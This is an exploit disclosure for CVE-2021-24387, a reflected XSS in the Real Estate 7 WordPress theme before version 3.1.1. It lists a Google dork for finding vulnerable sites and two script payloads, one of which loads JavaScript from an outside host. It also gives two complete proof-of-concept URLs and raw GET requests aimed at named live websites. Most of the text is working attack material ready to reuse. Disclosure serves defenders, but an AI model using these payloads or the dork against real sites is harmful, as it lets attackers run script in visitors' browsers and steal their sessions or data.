Real Estate 7 WordPress Theme < 3.1.1 - Unauthenticated Reflected XSS

[+] :: VULNERABILITY: Real Estate 7 WordPress Theme < 3.1.1 - Unauthenticated Reflected XSS
[+] :: GOOGLE DORK: inurl:/wp-content/themes/realestate-7/
[+] :: DATE: 2021-05-25
[+] :: SECURITY RESEARCHER: Visse [ https://visse.ru ]
[+] :: VENDOR: Contempo Themes [ https://www.contempothemes.com ]
[+] :: SOFTWARE VERSION: < 3.1.1
[+] :: SOFTWARE LINK: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
[+] :: CVSS: 3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
[+] :: CWE: CWE-79
[+] :: CVE: CVE-2021-24387



[i] == [ Info: ]

An Unauthenticated Reflected XSS vulnerability was discovered in the Real Estate 7 theme through v3.1.1 for WordPress.

Vulnerable parameter(s): &ct_community=.



[$] == [ Impact: ]

Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.



[%] == [ Payloads: ]

<script src=//m0ze.ru/payload/a.js></script>

<script>alert(document.domain);</script>



[!] == [ PoC #1 | Unauthenticated Reflected XSS | &ct_community: ]

https://elementor3.contempothemes.com/?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%20src=//m0ze.ru/payload/a.js%3E%3C/script%3E&ct_mls=&ct_brokerage=0&lat&lng

GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%20src=//m0ze.ru/payload/a.js%3E%3C/script%3E&ct_mls=&ct_brokerage=0&lat&lng HTTP/2
Host: elementor3.contempothemes.com



[!] == [ PoC #2 | Unauthenticated Reflected XSS | &ct_community: ]

https://misionloreto.com/?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert(document.domain);%3C/script%3E&ct_mls=&ct_brokerage=0&lat&lng

GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert(document.domain);%3C/script%3E&ct_mls=&ct_brokerage=0&lat&lng HTTP/2
Host: misionloreto.com



[@] == [ Contacts: ]

Website: visse.ru
Medium: @visse